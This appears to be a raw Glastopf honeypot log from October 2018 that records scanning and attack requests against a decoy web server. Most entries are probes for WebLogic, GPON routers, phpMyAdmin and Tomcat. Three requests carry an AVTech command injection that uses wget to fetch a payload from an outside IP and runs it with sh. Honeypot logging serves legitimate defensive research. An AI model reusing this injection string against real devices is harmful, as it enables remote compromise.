2018-10-13 12:08:54,625 (glastopf.glastopf) 47.93.233.88 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 15:45:21,779 (glastopf.glastopf) 95.85.11.140 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 15:45:22,569 (glastopf.glastopf) 95.85.11.140 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 20:27:15,207 (glastopf.glastopf) 193.112.215.160 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 20:27:18,354 (glastopf.glastopf) 193.112.215.160 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 20:27:55,585 (glastopf.glastopf) 61.216.152.133 requested POST /fndex.html?id=1 on 2798c8515bf7:80
2018-10-13 22:34:44,904 (glastopf.glastopf) 23.253.149.185 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 22:34:45,245 (glastopf.glastopf) 23.253.149.185 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 23:57:26,996 (glastopf.glastopf) 206.189.155.220 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-13 23:57:30,218 (glastopf.glastopf) 206.189.155.220 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 00:08:25,265 (glastopf.glastopf) 125.212.217.214 requested GET /robots.txt on 2798c8515bf7:80
2018-10-14 00:08:27,979 (glastopf.glastopf) 125.212.217.214 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-14 00:08:30,173 (glastopf.glastopf) 125.212.217.214 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-14 00:08:32,773 (glastopf.glastopf) 125.212.217.214 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-14 03:43:29,424 (glastopf.glastopf) 211.38.126.54 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 03:43:29,559 (glastopf.glastopf) 211.38.126.54 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 07:27:17,809 (glastopf.glastopf) 71.6.199.23 requested GET /robots.txt on 2798c8515bf7:80
2018-10-14 07:27:18,070 (glastopf.glastopf) 71.6.199.23 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-14 07:27:18,331 (glastopf.glastopf) 71.6.199.23 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-14 07:27:18,920 (glastopf.glastopf) 71.6.199.23 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-14 09:57:12,850 (glastopf.glastopf) 134.19.255.22 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-14 10:05:03,910 (glastopf.glastopf) 71.6.202.198 requested GET /ccvv on 2798c8515bf7:80
2018-10-14 13:29:15,802 (glastopf.glastopf) 47.52.248.191 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 13:29:15,914 (glastopf.glastopf) 47.52.248.191 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-14 20:12:43,991 (glastopf.glastopf) 162.244.81.140 requested GET /muieblackcat on 2798c8515bf7:80
2018-10-14 23:12:48,309 (glastopf.glastopf) 60.171.238.185 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-15 00:18:05,811 (glastopf.glastopf) 118.126.109.214 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 00:18:06,247 (glastopf.glastopf) 118.126.109.214 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 01:01:32,797 (glastopf.glastopf) 93.174.93.67 requested GET /w00tw00t.at.blackhats.romanian.anti-sec:) on 2798c8515bf7:80
2018-10-15 01:01:33,311 (glastopf.glastopf) 93.174.93.67 requested GET /MyAdmin/ on 2798c8515bf7:80
2018-10-15 01:01:35,408 (glastopf.glastopf) 93.174.93.67 requested GET /myadmin/ on 2798c8515bf7:80
2018-10-15 01:01:36,892 (glastopf.glastopf) 93.174.93.67 requested GET /mysqladmin/ on 2798c8515bf7:80
2018-10-15 01:01:40,955 (glastopf.glastopf) 93.174.93.67 requested GET /sqladmin/ on 2798c8515bf7:80
2018-10-15 01:01:42,458 (glastopf.glastopf) 93.174.93.67 requested GET /mysql/ on 2798c8515bf7:80
2018-10-15 01:01:43,034 (glastopf.glastopf) 93.174.93.67 requested GET /PHPMYADMIN/ on 2798c8515bf7:80
2018-10-15 01:01:43,615 (glastopf.glastopf) 93.174.93.67 requested GET /pHpMyAdMiN/ on 2798c8515bf7:80
2018-10-15 01:17:13,612 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-15 04:06:04,833 (glastopf.glastopf) 66.155.106.108 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 04:06:05,056 (glastopf.glastopf) 66.155.106.108 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 07:44:43,536 (glastopf.glastopf) 95.216.156.77 requested GET /muieblackcat on 2798c8515bf7:80
2018-10-15 18:28:18,278 (glastopf.glastopf) 37.59.57.78 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 18:28:19,997 (glastopf.glastopf) 37.59.57.78 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 20:33:56,644 (glastopf.glastopf) 119.146.87.107 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-15 20:33:56,998 (glastopf.glastopf) 119.146.87.107 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 01:32:49,260 (glastopf.glastopf) 47.99.84.2 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 01:32:49,741 (glastopf.glastopf) 47.99.84.2 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 04:19:17,865 (glastopf.glastopf) 118.24.18.106 requested GET /bea_wls_deployment_internal on 2798c8515bf7:80
2018-10-16 05:19:35,632 (glastopf.glastopf) 58.17.148.118 requested GET /HNAP1/ on 2798c8515bf7:80
2018-10-16 19:34:30,189 (glastopf.glastopf) 118.184.54.89 requested GET /upload/bank-icons/bank-gh.jpg on 2798c8515bf7:80
2018-10-16 19:34:30,295 (glastopf.glastopf) 118.184.54.89 requested GET /upload/bank-icons/bank_16.png on 2798c8515bf7:80
2018-10-16 20:45:03,420 (glastopf.glastopf) 146.88.240.128 requested POST / on 2798c8515bf7:80
2018-10-17 00:39:07,727 (glastopf.glastopf) 66.208.15.117 requested GET /webdav/ on 2798c8515bf7:80
2018-10-17 10:24:19,919 (glastopf.glastopf) 220.167.103.51 requested HEAD /newhome/img/logo.png on 2798c8515bf7:80
2018-10-17 17:01:16,622 (glastopf.glastopf) 180.97.106.39 requested HEAD http://180.163.113.82/check_proxy on 2798c8515bf7:80
2018-10-17 17:29:42,207 (glastopf.glastopf) 37.6.201.44 requested GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin on 2798c8515bf7:80
2018-10-17 17:29:42,483 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 404: Not Found
2018-10-17 18:10:15,841 (glastopf.glastopf) 68.161.231.230 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-17 18:22:31,505 (glastopf.glastopf) 5.189.164.29 requested GET /manager/html on 2798c8515bf7:80
2018-10-17 18:43:30,015 (glastopf.glastopf) 213.222.234.4 requested GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin on 2798c8515bf7:80
2018-10-17 18:43:30,256 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 404: Not Found
2018-10-18 01:15:42,576 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-18 01:16:05,854 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-18 06:55:40,081 (glastopf.glastopf) 220.167.103.51 requested HEAD /static/upload/20180921/th_317a3298794099e0bab477e4f3d732a4.png on 2798c8515bf7:80
2018-10-18 07:35:02,429 (glastopf.glastopf) 197.41.146.118 requested POST /GponForm/diag_Form?images/ on 2798c8515bf7:80
2018-10-18 08:44:29,798 (glastopf.glastopf) 109.242.196.104 requested GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://209.141.40.213/avtech%20-O%20niXd;%20chmod%20777%20niXd;%20sh%20niXd)&password=admin on 2798c8515bf7:80
2018-10-18 08:44:30,071 (glastopf.modules.handlers.emulators.rfi) Failed to fetch injected file, I/O error: HTTP Error 404: Not Found
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/Glastopf-3.1.3_dev-py2.7.egg/glastopf/modules/handlers/emulators/rfi.py", line 65, in download_file
    injected_file = urllib2.urlopen(req, timeout=4).read()
  File "/usr/lib/python2.7/urllib2.py", line 127, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 410, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/urllib2.py", line 523, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/urllib2.py", line 448, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/urllib2.py", line 382, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 531, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
HTTPError: HTTP Error 404: Not Found
2018-10-18 10:12:44,837 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-18 10:14:46,839 (glastopf.glastopf) 220.167.103.51 requested GET /index/article/lists/cid/3 on 2798c8515bf7:80
2018-10-18 10:30:57,928 (glastopf.glastopf) 46.37.21.50 requested GET /manager/html on 2798c8515bf7:80
2018-10-18 10:53:20,626 (glastopf.glastopf) 222.82.58.239 requested GET http://api.ipify.org/ on 2798c8515bf7:80
2018-10-18 10:53:28,883 (glastopf.glastopf) 221.13.12.142 requested GET http://boxun.com/ on 2798c8515bf7:80
2018-10-18 10:53:28,988 (glastopf.glastopf) 36.106.86.74 requested GET http://www.minghui.org/ on 2798c8515bf7:80
2018-10-18 10:53:29,989 (glastopf.glastopf) 116.252.2.111 requested GET http://www.rfa.org/english/ on 2798c8515bf7:80
2018-10-18 10:53:30,240 (glastopf.glastopf) 101.24.128.157 requested GET http://www.ip.cn/ on 2798c8515bf7:80
2018-10-18 10:53:31,817 (glastopf.glastopf) 106.45.1.49 requested GET http://www.123cha.com/ on 2798c8515bf7:80
2018-10-18 10:53:32,443 (glastopf.glastopf) 222.82.50.124 requested GET http://www.epochtimes.com/ on 2798c8515bf7:80
2018-10-18 17:56:36,025 (glastopf.glastopf) 213.128.88.99 requested GET /manager/html on 2798c8515bf7:80
2018-10-18 18:21:15,753 (glastopf.glastopf) 220.167.103.51 requested GET /index/article/lists/cid/3 on 2798c8515bf7:80
2018-10-18 18:44:20,344 (glastopf.glastopf) 37.49.231.125 requested GET /HNAP1/ on 2798c8515bf7:80
2018-10-18 21:13:19,715 (glastopf.glastopf) 209.141.34.186 requested GET /muieblackcat on 2798c8515bf7:80
2018-10-19 04:25:15,692 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-19 04:25:15,716 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-19 04:25:36,972 (glastopf.glastopf) 110.249.212.46 requested GET http://110.249.212.46/testget?q=23333&port=80 on 2798c8515bf7:80
2018-10-19 05:48:26,717 (glastopf.glastopf) 118.24.83.141 requested GET /webdav/ on 2798c8515bf7:80
2018-10-19 21:17:01,663 (glastopf.glastopf) 198.20.87.98 requested GET /robots.txt on 2798c8515bf7:80
2018-10-19 21:17:02,050 (glastopf.glastopf) 198.20.87.98 requested GET /sitemap.xml on 2798c8515bf7:80
2018-10-19 21:17:02,480 (glastopf.glastopf) 198.20.87.98 requested GET /.well-known/security.txt on 2798c8515bf7:80
2018-10-19 21:17:05,813 (glastopf.glastopf) 198.20.87.98 requested GET /favicon.ico on 2798c8515bf7:80
2018-10-20 03:14:25,618 (glastopf.glastopf) 213.128.88.99 requested GET /manager/html on 2798c8515bf7:80
2018-10-20 08:23:09,144 (glastopf.glastopf) 185.128.40.182 requested GET /manager/html on 2798c8515bf7:80
2018-10-20 15:36:21,793 (glastopf.glastopf) 217.170.203.137 requested GET /yealink/y000000000000.cfg on 2798c8515bf7:80
2018-10-21 10:30:29,800 (glastopf.glastopf) 120.76.234.199 requested GET /manager/html on 2798c8515bf7:80
2018-10-21 12:11:44,007 (glastopf.glastopf) 46.37.21.50 requested GET /manager/html on 2798c8515bf7:80
2018-10-21 19:59:51,019 (glastopf.glastopf) 80.114.11.69 requested GET /webadmin/tpl/style.admin.css on 2798c8515bf7:80